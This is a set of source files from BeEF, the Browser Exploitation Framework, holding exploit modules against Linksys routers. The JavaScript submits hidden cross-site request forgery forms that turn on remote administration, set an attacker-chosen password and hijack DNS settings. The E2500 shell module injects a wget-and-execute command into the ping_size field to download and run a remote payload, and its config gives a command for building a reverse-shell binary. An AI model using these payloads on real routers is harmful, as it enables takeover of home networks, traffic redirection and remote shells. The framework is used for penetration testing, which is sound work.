# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Linksys_befsr41_csrf < BeEF::Core::Command def self.options [ { 'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/' }, { 'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337' }, { 'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/linksys_e2500_csrf/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var port = '<%= @port %>'; var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; var timeout = 15; var e2500_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", "application/x-www-form-urlencoded", [{'type':'hidden', 'name':'submit_button', 'value':'Management'} , {'type':'hidden', 'name':'change_action', 'value':''}, {'type':'hidden', 'name':'action', 'value':'Apply'}, {'type':'hidden', 'name':'PasswdModify', 'value':'1'}, {'type':'hidden', 'name':'http_enable', 'value':'1'}, {'type':'hidden', 'name':'https_enable', 'value':'0'}, {'type':'hidden', 'name':'ctm404_enable', 'value':''}, {'type':'hidden', 'name':'remote_mgt_https', 'value':'1'}, {'type':'hidden', 'name':'wait_time', 'value':'4'}, {'type':'hidden', 'name':'need_reboot', 'value':'0'}, {'type':'hidden', 'name':'http_passwd', 'value':passwd}, {'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd}, {'type':'hidden', 'name':'_http_enable', 'value':'1'}, {'type':'hidden', 'name':'_https_enable', 'value':'0'}, {'type':'hidden', 'name':'web_wl_filter', 'value':'0'}, {'type':'hidden', 'name':'remote_management', 'value':'1'}, {'type':'hidden', 'name':'_remote_mgt_https', 'value':'0'}, {'type':'hidden', 'name':'remote_upgrade', 'value':'1'}, {'type':'hidden', 'name':'remote_ip_any', 'value':'1'}, {'type':'hidden', 'name':'http_wanport', 'value':port}, {'type':'hidden', 'name':'nf_alg_sip', 'value':'0'}, {'type':'hidden', 'name':'upnp_enable', 'value':'1'}, {'type':'hidden', 'name':'upnp_config', 'value':'1'}, {'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { document.body.removeChild(e2500_iframe_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/linksys_e2500_csrf/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: linksys_e2500_csrf: enable: true category: ["Exploits", "Router"] name: "Linksys E2500 CSRF" description: "Attempts to enable remote administration and change the password on a Linksys E2500 router." authors: ["Esteban Rodriguez"] target: working: ["ALL"]
Ruby
beef/modules/exploits/router/linksys_e2500_csrf/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Linksys_e2500_csrf < BeEF::Core::Command def self.options [ { 'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/' }, { 'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337' }, { 'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/linksys_e2500_dns_hijack/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { // config var target = 'http://<%= @rhost %>/apply.cgi'; var dns1 = '<%= @dns1 %>'; var timeout = 15; // validate primary DNS server IP address if (!beef.net.is_valid_ip(dns1)) { beef.debug('Invalid Primary DNS server IP address was provided'); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided"); return; } var parts = dns1.split('.'); // change DNS var linksys_e2500_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "POST", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'submit_button', 'value': 'index'}, {'type':'hidden', 'name':'change_action', 'value': ''}, {'type':'hidden', 'name':'submit_type', 'value': ''}, {'type':'hidden', 'name':'action', 'value': 'Apply'}, {'type':'hidden', 'name':'wan_dns', 'value': '4'}, {'type':'hidden', 'name':'wan_dns0_0', 'value': parts[0]}, {'type':'hidden', 'name':'wan_dns0_1', 'value': parts[1]}, {'type':'hidden', 'name':'wan_dns0_2', 'value': parts[2]}, {'type':'hidden', 'name':'wan_dns0_3', 'value': parts[3]}, {'type':'hidden', 'name':'wan_dns1_0', 'value': '0'}, {'type':'hidden', 'name':'wan_dns1_1', 'value': '0'}, {'type':'hidden', 'name':'wan_dns1_2', 'value': '0'}, {'type':'hidden', 'name':'wan_dns1_3', 'value': '0'}, {'type':'hidden', 'name':'wan_dns2_0', 'value': '0'}, {'type':'hidden', 'name':'wan_dns2_1', 'value': '0'}, {'type':'hidden', 'name':'wan_dns2_2', 'value': '0'}, {'type':'hidden', 'name':'wan_dns2_3', 'value': '0'}, {'type':'hidden', 'name':'wan_wins', 'value': '4'}, {'type':'hidden', 'name':'wan_wins_0', 'value': '0'}, {'type':'hidden', 'name':'wan_wins_1', 'value': '0'}, {'type':'hidden', 'name':'wan_wins_2', 'value': '0'}, {'type':'hidden', 'name':'wan_wins_3', 'value': '0'}, ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); // clean up cleanup = function() { document.body.removeChild(linksys_e2500_iframe_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/linksys_e2500_dns_hijack/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: linksys_e2500_dns_hijack: enable: true category: ["Exploits", "Router"] name: "Linksys E2500 DNS Hijack" description: "Attempts to change the DNS setting on a Linksys E2500 router." authors: ["Esteban Rodriguez"] target: working: ["ALL"]
Ruby
beef/modules/exploits/router/linksys_e2500_dns_hijack/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Linksys_e2500_dns_hijack < BeEF::Core::Command def self.options [ { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '192.168.1.1' }, { 'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/linksys_e2500_shell/command.js
// // Copyright (c) 2006-2023 Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var base = '<%= @base %>'; var payload = '<%= @payload %>'; var random = Math.random().toString(36).substring(7); var timeout = 15; var e2500_iframe_2<%= @command_id %> = beef.dom.createIframeXsrfForm(base + "apply.cgi", "POST", "application/x-www-form-urlencoded", [{'type':'hidden', 'name':'submit_button', 'value':'Diagnostics'} , {'type':'hidden', 'name':'change_action', 'value':'gozila_cgi'}, {'type':'hidden', 'name':'submit_type', 'value':'start_ping'}, {'type':'hidden', 'name':'action', 'value':''}, {'type':'hidden', 'name':'commit', 'value':'0'}, {'type':'hidden', 'name':'ping_ip', 'value':'192.168.1.1'}, {'type':'hidden', 'name':'ping_size', 'value':'&/tmp/' + random +'&'}, {'type':'hidden', 'name':'ping_times', 'value':'5'}, {'type':'hidden', 'name':'traceroute_ip', 'value':''}, ]); var e2500_iframe_1<%= @command_id %> = beef.dom.createIframeXsrfForm(base + "apply.cgi", "POST", "application/x-www-form-urlencoded", [{'type':'hidden', 'name':'submit_button', 'value':'Diagnostics'} , {'type':'hidden', 'name':'change_action', 'value':'gozila_cgi'}, {'type':'hidden', 'name':'submit_type', 'value':'start_ping'}, {'type':'hidden', 'name':'action', 'value':''}, {'type':'hidden', 'name':'commit', 'value':'0'}, {'type':'hidden', 'name':'ping_ip', 'value':'192.168.1.1'}, {'type':'hidden', 'name':'ping_size', 'value':'&/usr/bin/wget ' + payload + ' -O /tmp/' + random + ';chmod 777 /tmp/' + random + '&'}, {'type':'hidden', 'name':'ping_times', 'value':'5'}, {'type':'hidden', 'name':'traceroute_ip', 'value':''}, ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { document.body.removeChild(e2500_iframe_1<%= @command_id %>); document.body.removeChild(e2500_iframe_2<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/linksys_e2500_shell/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: linksys_e2500_shell: enable: true category: ["Exploits", "Router"] name: "Linksys E2500 Shell" description: "Attempts to exploit a command execution vulnerability on a Linksys E2500 router. <br> It will wget a binary payload to the temp directory, change permissions, and run the binary.<br>Command to generate payload: <b>msfpayload linux/mipsle/shell_reverse_tcp LHOST=[Attacker IP] X > reverse</b>" authors: ["Esteban Rodriguez"] target: working: ["ALL"]
Ruby
beef/modules/exploits/router/linksys_e2500_shell/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Linksys_e2500_shell < BeEF::Core::Command def self.options [ { 'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/' }, { 'name' => 'payload', 'ui_label' => 'Path to exploit payload', 'value' => 'http://192.0.2.2/payload' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/linksys_wrt54g2_csrf/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var port = '<%= @port %>'; var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; var timeout = 15; var wrt54g2_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST", "application/x-www-form-urlencoded", [{'type':'hidden', 'name':'MANAGE_USE_HTTP', 'value':'0'} , {'type':'hidden', 'name':'MANAGE_HTTP', 'value':'1'}, {'type':'hidden', 'name':'MANAGE_HTTP_S', 'value':'0'}, {'type':'hidden', 'name':'MANAGE_PASSWORDMOD', 'value':'1'}, {'type':'hidden', 'name':'MANAGE_PASSWORD', 'value':passwd}, {'type':'hidden', 'name':'MANAGE_PASSWORD_CONFIRM', 'value':passwd}, {'type':'hidden', 'name':'_http_enable', 'value':'1'}, {'type':'hidden', 'name':'MANAGE_WLFILTER', 'value':'1'}, {'type':'hidden', 'name':'MANAGE_REMOTE', 'value':'1'}, {'type':'hidden', 'name':'MANAGE_PORT', 'value':port}, {'type':'hidden', 'name':'MANAGE_UPNP', 'value':'1'}, {'type':'hidden', 'name':'layout', 'value':'en'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { document.body.removeChild(wrt54g2_iframe_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });
YAML
beef/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: linksys_wrt54g2_csrf: enable: true category: ["Exploits", "Router"] name: "Linksys WRT54G2 CSRF" description: "Attempts to enable remote administration and change the password on a Linksys WRT54G2 router." authors: ["Martin Barbella"] target: working: ["ALL"]
Ruby
beef/modules/exploits/router/linksys_wrt54g2_csrf/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Linksys_wrt54g2_csrf < BeEF::Core::Command def self.options [ { 'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/' }, { 'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337' }, { 'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__' } ] end def post_execute save({ 'result' => @datastore['result'] }) end end
JavaScript
beef/modules/exploits/router/linksys_wrt54g_csrf/command.js
// // Copyright (c) 2006-2023Wade Alcorn - [email protected] // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var port = '<%= @port %>'; var gateway = '<%= @base %>'; var passwd = '<%= @password %>'; var timeout = 15; var wrt54g_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST", "application/x-www-form-urlencoded", [ {'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} , {'type':'hidden', 'name':'http_enable', 'value':'1'}, {'type':'hidden', 'name':'https_enable', 'value':'0'}, {'type':'hidden', 'name':'PasswdModify', 'value':'1'}, {'type':'hidden', 'name':'http_passwd', 'value':passwd}, {'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd}, {'type':'hidden', 'name':'_http_enable', 'value':'1'}, {'type':'hidden', 'name':'remote_management', 'value':'1'}, {'type':'hidden', 'name':'web_wl_filter', 'value':'1'}, {'type':'hidden', 'name':'http_wanport', 'value':port}, {'type':'hidden', 'name':'upnp_enable', 'value':'1'}, {'type':'hidden', 'name':'layout', 'value':'en'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); cleanup = function() { document.body.removeChild(wrt54g_iframe_<%= @command_id %>); } setTimeout("cleanup()", timeout*1000); });